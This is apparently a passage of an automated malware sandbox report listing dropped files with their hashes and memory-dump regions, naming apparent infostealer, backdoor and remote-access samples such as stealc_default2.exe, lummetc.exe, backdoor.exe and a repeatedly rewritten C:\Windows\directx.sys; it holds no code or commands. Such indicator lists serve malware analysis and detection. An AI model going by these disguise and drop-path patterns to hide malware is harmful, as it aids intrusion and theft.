SHA256 d7f214dc55857c3576675279261a0ee1881f7ddee4755bb0b9e7566fc0f425a9
SHA512 35f3741538bd59f6c744bcad6f348f4eb6ea1ee542f9780daa29de5dbb2d772b01fe4774fb1c2c7199a349488be309ceedd562ceb5f1bdcdd563036b301dcd9f

C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~4.EXE

MD5 674eddc440664b8b854bc397e67ee338
SHA1 af9d74243ee3ea5f88638172f592ed89bbbd7e0d
SHA256 20bbf92426732ff7269b4f2f89d404d5fee0fa6a20944004d2eeb3cc2d1fa457
SHA512 5aced0e2235f113e323d6b28be74da5e4da4dc881629461df4644a52bccd717dc6d2632c40ed8190b3ad060b8b62c347757a0bbe82680d892114c1f0529146b7

C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~3.EXE

MD5 e4351f1658eab89bbd70beb15598cf1c
SHA1 e18fbfaee18211fd9e58461145306f9bc4f459ea
SHA256 4c783822b873188a9ced8bd4888e1736e3d4f51f6b3b7a62675b0dc85277e0eb
SHA512 57dbc6418011bcac298e122990b14ed1461c53b5f41cb4986d1d3bbbb516c764a7c205fc4da3722399fdb9122f28e4ec98f39d2af80d4b6a64d7bd7944d1c218

C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaws.exe

MD5 452c3ce70edba3c6e358fad9fb47eb4c
SHA1 d24ea3b642f385a666159ef4c39714bec2b08636
SHA256 da73b6e071788372702104b9c72b6697e84e7c75e248e964996700b77c6b6f1c
SHA512 fe8a0b9b1386d6931dc7b646d0dd99c3d1b44bd40698b33077e7eeba877b53e5cb39ff2aa0f6919ccab62953a674577bc1b2516d9cadc0c051009b2083a08085

C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\java.exe

MD5 9a8d683f9f884ddd9160a5912ca06995
SHA1 98dc8682a0c44727ee039298665f5d95b057c854
SHA256 5e2e22ead49ce9cc11141dbeebbe5b93a530c966695d8efc2083f00e6be53423
SHA512 6aecf8c5cb5796d6879f8643e20c653f58bad70820896b0019c39623604d5b3c8a4420562ab051c6685edce60aa068d9c2dbb4413a7b16c6d01a9ac10dc22c12

C:\PROGRA~2\COMMON~1\MICROS~1\VSTO\10.0\VSTOIN~1.EXE

MD5 cbd96ba6abe7564cb5980502eec0b5f6
SHA1 74e1fe1429cec3e91f55364e5cb8385a64bb0006
SHA256 405b8bd647fa703e233b8b609a18999abe465a8458168f1daf23197bd2ea36aa
SHA512 a551001853f6b93dfbc6cf6a681820af31330a19d5411076ff3dbce90937b3d92173085a15f29ebf56f2ef12a4e86860ac6723ebc89c98ea31ea7a6c7e3d7cdc

C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jaureg.exe

MD5 ce82862ca68d666d7aa47acc514c3e3d
SHA1 f458c7f43372dbcdac8257b1639e0fe51f592e28
SHA256 c5a99f42100834599e4995d0a178b32b772a6e774a4050a6bb00438af0a6a1f3
SHA512 bca7afd6589c3215c92fdaca552ad3380f53d3db8c4b69329a1fa81528dd952a14bf012321de92ad1d20e5c1888eab3dd512b1ac80a406baccc37ee6ff4a90dc

memory/4584-233-0x0000000000400000-0x000000000041B000-memory.dmp

C:\Windows\directx.sys

MD5 e1dd58ad5a6ca19998edb9c73e921c07
SHA1 221ce5e6021c3562cad9cec5495c43c527e1e133
SHA256 00da640f2311b66bc839cfebf26853e6da48b859dfbcb6c77ebec7f998039af5
SHA512 d62460a5d27bb33d574afd67b7801201857d645e988323feed301e0dbf4dd4380ef46b53ce5e16f48f7aad176b98626f72a1d471ebc7680baf5ab334ad69747b

memory/404-239-0x0000000000A10000-0x0000000000A94000-memory.dmp

memory/1988-252-0x0000000000400000-0x000000000041B000-memory.dmp

C:\Windows\directx.sys

MD5 d800fafc6e505f2969f1b57815a269fd
SHA1 017587339865f262f998b4f5519e4a3ab9eb944a
SHA256 7092d53c9b3a6f2fa833ae066f690de389b338f2dd9c28c65a5042c3c513f2a2
SHA512 87e0bd79753236b068c910ddd0049fd912f67838ba3c4ae37ea14951890b0bb9f520d5e7c8ca11d8498ba43670d97b3201a7ebc35a4534e4571831361584ed67

memory/2920-258-0x0000000000400000-0x000000000041B000-memory.dmp

memory/2792-259-0x0000000000400000-0x000000000041B000-memory.dmp

memory/2816-261-0x0000000000400000-0x000000000041B000-memory.dmp

memory/2844-262-0x0000000000400000-0x000000000041B000-memory.dmp

memory/3020-263-0x000000001C880000-0x000000001C8D0000-memory.dmp

memory/3020-264-0x000000001C990000-0x000000001CA42000-memory.dmp

memory/2920-265-0x0000000000400000-0x000000000041B000-memory.dmp

memory/2844-266-0x0000000000400000-0x000000000041B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\winn.exe

MD5 5e7c5bff52e54cb9843c7324a574334b
SHA1 6e4de10601761ae33cf4de1187b1aefde9fefa66
SHA256 32768587423824856dcd6856228544da79f0a2283f822af41b63a92b5259c826
SHA512 8b07b8470a8536ca0541672cb8bf5dc5ed7fa124cfc454868564b86474d07c17ef985fc731754e4d37cc5c81f8813f0d2b59223e7b3b6268c10ff2af8f39eaa2

C:\Windows\directx.sys

MD5 1fffa1f483b430fcdf5dfd34358c3be3
SHA1 e95d15f95c2d57a0eeea6e59018891d147a8cfd9
SHA256 ba397194d949bf3c44fddebb291a69524429c78737833d41054ec23b543fc519
SHA512 adf11a621516dadbfbf6d323ae1a6a917868878ab34cb6f381a6701c480817424743e3cef3127db11eec85ae0acc9f5366a272490234b67735f8bb5346c4e816

memory/2920-283-0x0000000000400000-0x000000000041B000-memory.dmp

memory/1792-284-0x000001A2F5630000-0x000001A2F5760000-memory.dmp

memory/1792-285-0x000001A2F7BA0000-0x000001A2F7CCA000-memory.dmp

memory/1792-287-0x000001A2F7BA0000-0x000001A2F7CC3000-memory.dmp

memory/1792-325-0x000001A2F7BA0000-0x000001A2F7CC3000-memory.dmp

memory/1792-339-0x000001A2F7BA0000-0x000001A2F7CC3000-memory.dmp

memory/1792-337-0x000001A2F7BA0000-0x000001A2F7CC3000-memory.dmp

memory/1792-335-0x000001A2F7BA0000-0x000001A2F7CC3000-memory.dmp

memory/1792-333-0x000001A2F7BA0000-0x000001A2F7CC3000-memory.dmp

memory/1792-331-0x000001A2F7BA0000-0x000001A2F7CC3000-memory.dmp

memory/1792-329-0x000001A2F7BA0000-0x000001A2F7CC3000-memory.dmp

memory/1792-327-0x000001A2F7BA0000-0x000001A2F7CC3000-memory.dmp

memory/1792-323-0x000001A2F7BA0000-0x000001A2F7CC3000-memory.dmp

memory/1792-322-0x000001A2F7BA0000-0x000001A2F7CC3000-memory.dmp

memory/1792-319-0x000001A2F7BA0000-0x000001A2F7CC3000-memory.dmp

memory/1792-317-0x000001A2F7BA0000-0x000001A2F7CC3000-memory.dmp

memory/1792-315-0x000001A2F7BA0000-0x000001A2F7CC3000-memory.dmp

memory/1792-313-0x000001A2F7BA0000-0x000001A2F7CC3000-memory.dmp

memory/1792-311-0x000001A2F7BA0000-0x000001A2F7CC3000-memory.dmp

memory/1792-309-0x000001A2F7BA0000-0x000001A2F7CC3000-memory.dmp

memory/1792-307-0x000001A2F7BA0000-0x000001A2F7CC3000-memory.dmp

memory/1792-305-0x000001A2F7BA0000-0x000001A2F7CC3000-memory.dmp

memory/1792-299-0x000001A2F7BA0000-0x000001A2F7CC3000-memory.dmp

memory/1792-297-0x000001A2F7BA0000-0x000001A2F7CC3000-memory.dmp

memory/1792-291-0x000001A2F7BA0000-0x000001A2F7CC3000-memory.dmp

memory/1792-289-0x000001A2F7BA0000-0x000001A2F7CC3000-memory.dmp

memory/1792-286-0x000001A2F7BA0000-0x000001A2F7CC3000-memory.dmp

memory/1792-303-0x000001A2F7BA0000-0x000001A2F7CC3000-memory.dmp

memory/1792-301-0x000001A2F7BA0000-0x000001A2F7CC3000-memory.dmp

memory/1792-295-0x000001A2F7BA0000-0x000001A2F7CC3000-memory.dmp

memory/1792-293-0x000001A2F7BA0000-0x000001A2F7CC3000-memory.dmp

memory/1792-1359-0x000001A2F7E40000-0x000001A2F7EE4000-memory.dmp

memory/1792-1360-0x000001A2F7360000-0x000001A2F73AC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\cryptography_module_windows.exe

MD5 ec69806113c382160f37a6ace203e280
SHA1 4b6610e4003d5199bfe07647c0f01bea0a2b917a
SHA256 779a5fe11a1db6a3b4a064a57106c126b306a027b89200c72744eeac0db0bfe2
SHA512 694d1a907abe03bef1d0f39679b920fdb8e14ebf3443d56defedbf31f8fa7458a89d547c9e9c315cdd226f614d1e436afd52622c119cb9d83d9751ff7854c946

C:\Windows\directx.sys

MD5 059fd5d57d7b335b25ac5847d6f37c57
SHA1 4a7b665c184006d8cf5d160c448bf92dce1322be
SHA256 ff28a01b321d9b14b8705fd05341c016034e5d48bf510d014be3bbbfbe75f290
SHA512 d2ec06b99539c59505f13f2229d39c80750e089e1479f945fc55a5fd882e28b64eb33d5b2705ba11f8fbaed679195ac8456dfa17a37128880d5acb4e90dcf3f7

C:\Users\Admin\AppData\Local\Temp\Files\soft.exe

MD5 47f1ea7f21ad23d61eeb35b930bd9ea6
SHA1 dc454a2dfa08394ee0c00b1d19e343a365d2ce40
SHA256 9ef55d2f9f8b77a6d426df4e7b113b7517bbc94eca4230e423d6eef546eb7357
SHA512 c08b36588c194ec8e857aae75b9179175ed2577506819b14839245aa2e46b4d3773404f8af9cf5ecfc6a1162a2a10413038af483e7e566f9f6d097e534bb6c70

C:\Windows\directx.sys

MD5 5907c465cd65ee2dbb2e0308e5afc19c
SHA1 a3d24cb2a588973dd55da85f5435ccc887a05567
SHA256 2e67f3b68c4793bb1208551aa03e0fe29789fe3f91321f37d104646dc11c9ad8
SHA512 0d0e6a70fb60636d16ee31076f9a53a459865fc92cb48ffd007c93c7b7f8b33fc134b70ff4c2701faafbb9d2ead21184152751c51808ad11c6f7b3ccf3953501

C:\Users\Admin\AppData\Local\Temp\Files\random.exe

MD5 b58725b0a514974aae36a20730adc4b3
SHA1 a99eb4395fc9a95cad952a7d4bd444fb3baa9103
SHA256 a64238bb65c406ec9ef9267f96de8b2ff4a2dc1998859970f2b7399aed50db76
SHA512 21ed4926463abff571fa30161607cfc58ef2106683295830764a6008d9e6c1228271966c951c030b13db295217b7f568797ebf74fb02a4ed86d198a34d9b7a29

C:\Windows\directx.sys

MD5 535b859daff613d5b62902e9405babe1
SHA1 4903c279c3beac744c9cd03c41bc829c419b3ea8
SHA256 01f773a003d6c8fcf86b04afe41b569e78d109a321cd95b00623549518b5cc37
SHA512 136d313f0c181b3a3e3cd81d69247c85e8cbe2f7fe9923b0da66757bfd6f481c97fb36c054098e87683ed4264da282227cff409fe7dac80f23d01622a2c78115

memory/1264-1496-0x00000000009B0000-0x0000000000E7C000-memory.dmp

memory/1264-1500-0x00000000009B0000-0x0000000000E7C000-memory.dmp

C:\Windows\directx.sys

MD5 b47b1059bc03ddbc7358f460a5ed54ff
SHA1 17156817a5fb3f1a264c5317bf07393e6bdc9a11
SHA256 e080784f9dae588a5aeeba9ba14d1d314e4eda77ad0673662f25c0799b6ac19d
SHA512 f6a1253d89335a70e37bfdd4196896a53f6f7b71d971e1e5dec3b6b8a1d11cac7e92af44371cbd2bfc8444cde4ff866f3b67068ecf1fa8a3412889ec4128897d

memory/1088-1506-0x0000000000A20000-0x0000000000EEC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\m.exe

MD5 0c883b1d66afce606d9830f48d69d74b
SHA1 fe431fe73a4749722496f19b3b3ca0b629b50131
SHA256 d921fc993574c8be76553bcf4296d2851e48ee39b958205e69bdfd7cf661d2b1
SHA512 c047452a23efad4262479fbfeb5e23f9497d7cefd4cbb58e869801206669c2a0759698c70d18050316798d5d939b989537fdce3842aa742449f5e08ed7fa60a5

C:\Windows\directx.sys

MD5 84ee29475532863d7e6aa53705cf40a9
SHA1 acb3d49dd7de902e320031fbffc6d943475df504
SHA256 c48e73150bebc48acc81bfa1bbe0729a678c3fe2f90cb35598a5ae0b19bf33a0
SHA512 907ba3f6bb0f16aed5943c06129e41a89f715c33a3d34e52252da90263c7552a4202d9bc9fafd80fe780613e14843348a5406090b25eb3fc4fdbf233da911212

memory/3832-1530-0x0000000000A20000-0x0000000000EEC000-memory.dmp

memory/1088-1528-0x0000000000A20000-0x0000000000EEC000-memory.dmp

memory/3896-1543-0x0000000000A20000-0x0000000000EEC000-memory.dmp

memory/3832-1542-0x0000000000A20000-0x0000000000EEC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\Trojan.Malpack.Themida%20(Anti%20VM).exe

MD5 922246d2938c77b783e112830796aa9f
SHA1 68212e1c4d8852a67fac6a1aa0e7d2672bba310d
SHA256 c7abff0928c85d80fcaad1ca24ecfe50a979f377652b96f25e3574a2eca772bf
SHA512 b56ed54b412d6b536318b8289354a3a58e1c967be179d429b9ebfa44406e579f014a7e635e11e24d206325354c66fc59b50e6fca7f221a0b6f85a0589a5efbe4

C:\Windows\directx.sys

MD5 26aeffdc244fd2dd93ff072f968e7530
SHA1 5dc28c451bb62db8fa9539af26abde0dd6ed7c54
SHA256 600b6acf583bca5f1296aa032fd4b1c1cc4fe1251f970c6d5a078ad3c9745011
SHA512 a3a9eab795c500f906e6b8d95c81cbf41148eba7134070356d2b7c35b31fd456a05f55d45aba67f0a309aca7df397f0be15682c6a75180e5d30db1eb3a7b60ce

C:\Users\Admin\AppData\Local\Temp\Files\backdoor.exe

MD5 698f5896ec35c84909344dc08b7cae67
SHA1 4c3eb447125f74f2eef63e14a5d97a823fa8d4e9
SHA256 9cc2e2d5feeb360b2ea9a650809468f08e13c0e997ebadf5baa69ae3c27a958e
SHA512 2230abef3f2ac7fff21f2af8a1df79a0ab3f7b1153ce696745ff5cef7f677bfe562dc820eb36be8e4819210ffa565d52e3b940f0cad5427d30a3aa05a4bcde2b

memory/3484-1568-0x0000000000090000-0x0000000000C58000-memory.dmp

C:\Windows\directx.sys

MD5 dd35cb97b4d3da56073aff7562b698d5
SHA1 b908da66d22444420522295339c06a4e5206a3e7
SHA256 f0852a362e8aa6f931fa2b46bd9567bab80fed0cf0cd9e44dea1b84a052064f3
SHA512 7a5c45aece666c9f190ca045afc6b9242b0b108280d7bb2bbdde91015b90a32bd5c2e36b273b62e345cc522a70ac447c12583da5d3decef1a1daece1a3b6187b

memory/3896-1595-0x0000000000A20000-0x0000000000EEC000-memory.dmp

memory/1840-1596-0x0000000000A20000-0x0000000000EEC000-memory.dmp

C:\Windows\directx.sys

MD5 0c2337d2fbca82e6c189ed97861d8461
SHA1 3e3950423947646040de2e3b98b7ad00d235e2ec
SHA256 9b51e2c22d0b9d766d8740e8297dde38a19a657d84a6cb8c705d03e7289867be
SHA512 58edc987be7e5ea8e9342cb33d510bc0f892dbb43d41ab19a569393336a2d381bc7a6135bb5a6489a40b5584d683276939b960951e1ea767e6a4ec9711deb649

C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe

MD5 90aadf2247149996ae443e2c82af3730
SHA1 050b7eba825412b24e3f02d76d7da5ae97e10502
SHA256 ee573647477339784dcef81024de1be1762833a20e5cc2b89a93e47d05b86b6a
SHA512 eec32bb82b230dd309c29712e72d4469250e651449e127479d178eddbafd5a46ec8048a753bc2c1a0fdf1dc3ed72a9453ca66fb49cbf0f95a12704e5427182be

memory/1840-1619-0x0000000000A20000-0x0000000000EEC000-memory.dmp

memory/1368-1622-0x0000000000A20000-0x0000000000EEC000-memory.dmp

memory/5036-1620-0x0000026F8B520000-0x0000026F8B5DA000-memory.dmp

memory/1792-1607-0x000001A2F7CD0000-0x000001A2F7D24000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tt3f3v55.xcn.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4980-1631-0x000001887D470000-0x000001887D492000-memory.dmp

memory/4496-1645-0x0000000000A20000-0x0000000000EEC000-memory.dmp

memory/1368-1650-0x0000000000A20000-0x0000000000EEC000-memory.dmp

memory/4496-1655-0x0000000000A20000-0x0000000000EEC000-memory.dmp

memory/2892-1662-0x0000000000A20000-0x0000000000EEC000-memory.dmp

memory/556-1664-0x0000000000290000-0x0000000000296000-memory.dmp

C:\Windows\directx.sys

MD5 8e966011732995cd7680a1caa974fd57
SHA1 2b22d69074bfa790179858cc700a7cbfd01ca557
SHA256 97d597793ec8307b71f3cfb8a6754be45bf4c548914367f4dc9af315c3a93d9b
SHA512 892da55e0f4b3ff983019c11d58809fdcb8695d79c617ddc6251791308ee013bf097d1b4a7541140f7a01c56038a804974a4f154cc1b26e80e5cf5c07adf227c

memory/3484-1679-0x0000000000090000-0x0000000000C58000-memory.dmp

memory/2892-1687-0x0000000000A20000-0x0000000000EEC000-memory.dmp

memory/2124-1685-0x0000000000A20000-0x0000000000EEC000-memory.dmp

memory/2124-1704-0x0000000000A20000-0x0000000000EEC000-memory.dmp

memory/3484-1730-0x0000000000090000-0x0000000000C58000-memory.dmp

memory/3576-1731-0x0000000000A20000-0x0000000000EEC000-memory.dmp

memory/3484-1734-0x0000000000090000-0x0000000000C58000-memory.dmp

memory/3484-1736-0x0000000003600000-0x0000000003692000-memory.dmp

memory/2268-1735-0x0000000000A20000-0x0000000000EEC000-memory.dmp

memory/3484-1737-0x00000000068A0000-0x0000000006E46000-memory.dmp

memory/4316-1748-0x0000000000A20000-0x0000000000EEC000-memory.dmp

memory/3576-1750-0x0000000000A20000-0x0000000000EEC000-memory.dmp

memory/4316-1753-0x0000000000A20000-0x0000000000EEC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe

MD5 68a99cf42959dc6406af26e91d39f523
SHA1 f11db933a83400136dc992820f485e0b73f1b933
SHA256 c200ddb7b54f8fa4e3acb6671f5fa0a13d54bd41b978d13e336f0497f46244f3
SHA512 7342073378d188912b3e7c6be498055ddf48f04c8def8e87c630c69294bcfd0802280babe8f86b88eaed40e983bcf054e527f457bb941c584b6ea54ad0f0aa75

memory/1080-1763-0x0000000002450000-0x0000000002486000-memory.dmp

memory/1080-1764-0x0000000004F40000-0x000000000560A000-memory.dmp

memory/1080-1765-0x0000000004E80000-0x0000000004EA2000-memory.dmp

memory/1080-1776-0x0000000005780000-0x00000000057E6000-memory.dmp

memory/1080-1775-0x0000000005710000-0x0000000005776000-memory.dmp

memory/1080-1784-0x00000000057F0000-0x0000000005B47000-memory.dmp

C:\Windows\directx.sys

MD5 4cb71ebef755fb064c648dd98a981b6e
SHA1 60a847973ba4b39731def0709f590185ade16621
SHA256 53e7dcb0046c62c840a34b5c6f01a086746d29261fe8347204c304ac8cd66905
SHA512 529d769c056e76472caec4176f00411c1c265283629f2d83e89f07d3f8b7f626cbd309260f5aceba811f276a912b215efe5be1bfc2121aa6c9582a1b5e6f2cff

memory/4708-1791-0x0000000000080000-0x00000000002E1000-memory.dmp

memory/788-1790-0x0000000000A20000-0x0000000000EEC000-memory.dmp

memory/1080-1792-0x0000000005DC0000-0x0000000005DDE000-memory.dmp

memory/1080-1793-0x0000000005E00000-0x0000000005E4C000-memory.dmp

memory/1080-1799-0x0000000006F90000-0x0000000006FC2000-memory.dmp

memory/1080-1810-0x0000000006FD0000-0x0000000006FEE000-memory.dmp

memory/1080-1800-0x000000006EF30000-0x000000006EF7C000-memory.dmp

memory/1080-1811-0x0000000006FF0000-0x0000000007093000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1001527001\aqbjn3fl.exe

MD5 34a152eb5d1d3e63dafef23579042933
SHA1 9e1c23718d5b30c13d0cec51ba3484ddc32a3184
SHA256 42365467efe5746a0b0076a3e609219a9cffe827d5a95f4e10221f081a3bf8fa
SHA512 270298ca39c3ff0ab4c576374a5c091135efad3c1cb9930888a74ef7d421f43039c2545eadecb037fcff2b8ee4e22cd4d809b19e7958b44ba1c72100135a46fe

memory/1080-1820-0x0000000007770000-0x0000000007DEA000-memory.dmp

memory/1080-1821-0x0000000007130000-0x000000000714A000-memory.dmp

C:\Windows\directx.sys

MD5 ff279068a711976404522563df5c3beb
SHA1 69e5735b9e63ea4dcb5b92a64448ac820bee5196
SHA256 b6681f47408abe739433a52aee73a58bc1ef637641d4697598a6254168652637
SHA512 8a5aa05b140f00387c308555a0e267b629a64cdce2b47aa884d5a00bc758713a7bb4b348920d81a2eadede67f43db5f3c20c3ef63f9d047dae7d707734ad5720

memory/1080-1835-0x0000000007190000-0x000000000719A000-memory.dmp

memory/1080-1836-0x00000000073A0000-0x0000000007436000-memory.dmp

memory/3360-1839-0x0000000000A20000-0x0000000000EEC000-memory.dmp

memory/3484-1862-0x00000000076A0000-0x00000000076F0000-memory.dmp

memory/3484-1863-0x00000000078D0000-0x0000000007946000-memory.dmp

memory/3484-1864-0x0000000007950000-0x000000000796E000-memory.dmp

memory/4248-1875-0x0000000005730000-0x0000000005A87000-memory.dmp

memory/4248-1877-0x0000000006300000-0x0000000006322000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1002824001\90b1cecd19.exe

MD5 6a3268db51b26c41418351e516bc33a6
SHA1 57a12903fff8cd7ea5aa3a2d2308c910ac455428
SHA256 eaebfc5e60378bbc47a603ca1310440c290a396cb2446de36ff6e7afb624ee0c
SHA512 43f257dbb7e444355e29a8023e8c8838c9e0ca7538a86c25ac41db1e0308bf73c3adda1b0fe5d0bcf536387b9ce5f8fed216f5f7d92c80bcc12e7bffde979b33

C:\Windows\directx.sys

MD5 52d34d5cc6f04c79f137a32847149b09
SHA1 7c99b81eb63b272fef8f71d7b05e610f637cde13
SHA256 bc0da89e3910714b5ea5610a08beb393e52b49e7665f968e3543eaacda259b1a
SHA512 f343e92f4196bb5d16ea7eac781fb13b5b4b4b375a0ea7650d80ee01bbd4796b3c75e23d32741c96d3d7d299e20219df54532393edcc04c40ca80de06089d97b

memory/2188-1928-0x00000000001B0000-0x00000000004AB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1003013001\AllNew.exe

MD5 c07e06e76de584bcddd59073a4161dbb
SHA1 08954ac6f6cf51fd5d9d034060a9ae25a8448971
SHA256 cf67a50598ee170e0d8596f4e22f79cf70e1283b013c3e33e36094e1905ba8d9
SHA512 e92c9fcd0448591738daedb19e8225ff05da588b48d1f15479ec8af62acd3ea52b5d4ba3e3b0675c2aa1705185f5523dcafdf14137c6e2984588069a2e05309f

C:\Windows\directx.sys

MD5 0b83a158bc72c093d99c390f94bbf942
SHA1 3242eb5ba601149238cf28f3a5d168e7dd9aed6a
SHA256 fcda7bfebd4b117f185004cac008f130936cbc732cfc69e2a781f22dc5c2566a
SHA512 41667c90e5366c8136655a077a27ea71db9a3f1a195d1bd48c93d9cc5b67fb34d425c502b4955a9e91bb443f3c3bbd752537b50f06a0af400f4d866b65cfff1c

C:\Windows\directx.sys

MD5 15ebecc758ff08b09c1ce084f05ad69f
SHA1 ccdd4cfc9113b3d2e84e692cd2ca8e592fe7db6a
SHA256 b504604dd5484579e4e6858ef73cb0686e3a969eecb4da177943e0fc84d512c8
SHA512 ff6c6483f8ad833a9045e269bf6266b0e7ddea1635fbbafc7d14e11f2c1d5766012dff243d30977836ca8fca2eb5bbb59bbff83a028c05fe6fdbf4d7d82ba6e4

memory/3484-1965-0x00000000091D0000-0x00000000091E2000-memory.dmp

memory/3484-1964-0x00000000077B0000-0x00000000077BA000-memory.dmp

memory/3620-2008-0x0000000005EE0000-0x0000000006237000-memory.dmp

memory/2188-2019-0x00000000001B0000-0x00000000004AB000-memory.dmp

memory/3620-2029-0x00000000065B0000-0x00000000065FC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe

MD5 59a9510540fec35043b990deb270b139
SHA1 54d66862a4c08ebcba8029ec99d558725603f486
SHA256 9c113da0d913a9fd2a84c5c9a71da4338e3f16a62b8215ecb7a58d10ccab524f
SHA512 011ea8ffe125a6f68f149a0a5b7bcd95197ac8b7d3d7d362807ef984e971411f2b125921fbcbc183e95633555ac58c4e287b6a858f19e077dd9a8eb0975e3e06

C:\Windows\directx.sys

MD5 13426aac4abbd498165bdbf1bcbca346
SHA1 3987260670fd4d9aaf26183ea8cd12ce97a3067d
SHA256 9646a15357fd72ada4b40fee9e978865870a83a842182512851a7e6f847f3b26
SHA512 ee48ef42a9c893d81e4b1e5da297ddf15de085a93aa804846b31acef92d185fc4f97cfd47d7aa2c9b14e0381b8c49c4a149e163dbb2a2863f3f81b32734606b1

memory/1276-2046-0x0000000000D90000-0x0000000000DA2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\lummetc.exe

MD5 2fe92adf3fe6c95c045d07f3d2ecd2ed
SHA1 42d1d4b670b60ff3f27c3cc5b8134b67e9c4a138
SHA256 13167320a0e8266a56694be70a9560c83e2c645d6eeaa147b9ae585c2960ebb2
SHA512 0af7b4a3ce3981707ca450b90829a4a8e933ea3cd3affbce738265a1a0647e96323117db325d0e5e3884f67f36b21b8c955b6c3c6dda21d9b01212e28ef88d65

C:\Windows\directx.sys

MD5 e86df8ab91b93361ace8d269bf0cfd04
SHA1 c2facf14233781bc73c701d8d9d1f361a8f1b214
SHA256 98288e886d52067e31bb443e155eebc87b92c7d094c42357ac2097ae7d3264ef
SHA512 dfdf60ca05adba7194f5f4b6cdb104eb8a58edb10838f6c5255c6d2aad7e5cfe6f0c5cc11e41093164bb1e628445496fabbbc910af12e5dd46665463f50e7f65

memory/3484-2091-0x0000000000090000-0x0000000000C58000-memory.dmp

C:\Windows\directx.sys

MD5 9e06cbaea528ed37c8d88cb88a27a9ff
SHA1 8c6863473edbbe39d692ede22a57d09076bd40e1
SHA256 fb23916ef2ef95cabf567d35d79de3209bd357967bbe1aac618b684d06f4ad36
SHA512 b9ea6e2ef1e35be7ee1e2782452ff4419787792299b30cfd7adf9b37dc6d92d3e6ec36040e6320822e405c7fafe7f79d05975b8430af113041d1726a9bf90754

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 58178700e2f7914aedfd11fb577a63a0
SHA1 87c773a2392c142bb5b4e5db73be7103f45cd82f
SHA256 33912895c35a081e4995bb6f9974c04a6b00f529514cab23b181bf72704df4f6
SHA512 3d4f92594fe876b39c0d2e79a2f6f254cf93037a6ecda2d9e51f039e21c11c51bf2fdb2e141ed52d048036c4397c1d288d6c6f59b5709fd6d8c1c780d9c18999

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 daa8f67a577d6952d844ed0bc9fcb106
SHA1 c9339419695645a02130b1bc8490abe64765fcb4
SHA256 1679137361d5696d0421c2ac15b56963d00e684635d3d004c42daf26c6dee4ef
SHA512 d7fe0ad63ee68cb7c75456ca5ccf7e8aa8986bf188b5fd9659e4ce3b8e6645eaa028adf3f07dc0377455dbf006e56da7242dbdd68b326d79ec43be5c12559473

memory/3220-2205-0x00000000065B0000-0x00000000065FC000-memory.dmp

memory/3712-2227-0x000000006F0B0000-0x000000006F0FC000-memory.dmp

memory/3220-2237-0x00000000075D0000-0x0000000007673000-memory.dmp

memory/3220-2217-0x000000006F0B0000-0x000000006F0FC000-memory.dmp

memory/3620-2239-0x000000006F0B0000-0x000000006F0FC000-memory.dmp

memory/1624-2250-0x000000006F0B0000-0x000000006F0FC000-memory.dmp

C:\ProgramData\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

C:\Users\Admin\AppData\Local\Temp\1003374001\kxfh9qhs.exe

MD5 b3834900eea7e3c2bae3ab65bb78664a
SHA1 cf5665241bc0ea70d7856ea75b812619cb31fb94
SHA256 cc35b0641c3c85446892311031369a42990c019c7b143b875be5c683e83ff3ce
SHA512 ae36ab053e692434b9307a21dcebe6499b60a3d0bca8549d7264b4756565cb44e190aa9396aea087609adaeb1443f098da1787fd8ffe2458c4fa1c5faea15909

C:\Windows\directx.sys

MD5 a5f9082adf4db96426c657ca60f6809a
SHA1 aa2d0e0a6342710a98605636e07ad6fe41b0e27f
SHA256 73a9f3e1fe8b0984d08acf309e5ccbc7f717b42ea5251f712b8da8f33926f8ad
SHA512 50d0a7280b12ca0dac36b35c13576a1d3e5b5bed9ccd079d2d3b0a34db8462f7b7b61f20e72612b65b6c2dc613f3a970bd33c590cc59033ed6bb7894877e6484

memory/2252-2532-0x0000000000400000-0x0000000000AD0000-memory.dmp

memory/4708-2550-0x0000000000080000-0x00000000002E1000-memory.dmp

memory/2252-2568-0x0000000000400000-0x0000000000AD0000-memory.dmp

C:\ProgramData\AMMYY\aa_nts.log

MD5 9e5a8822fe99336922970cf445a46470
SHA1 5dbc6fa3264249ca47524fba6f2942f9abbd7ffc
SHA256 97ba8549d7cda421592a621ced0a7bfb22bdbee3e47630019f9f7747af810d12
SHA512 3129c3e217a5415823c4680a58f96db8b8d5611c80d314f7fbb45d52889bfa3a2a0b690b9ac9c4286336c5fca6cde67ec1394439f3fbf0a80b7fbe377a416a2d

C:\Users\Admin\AppData\Local\Temp\1003620001\trru7rd2.exe

MD5 7b5e89271f2f7e9a42d00cd1f1283d0f
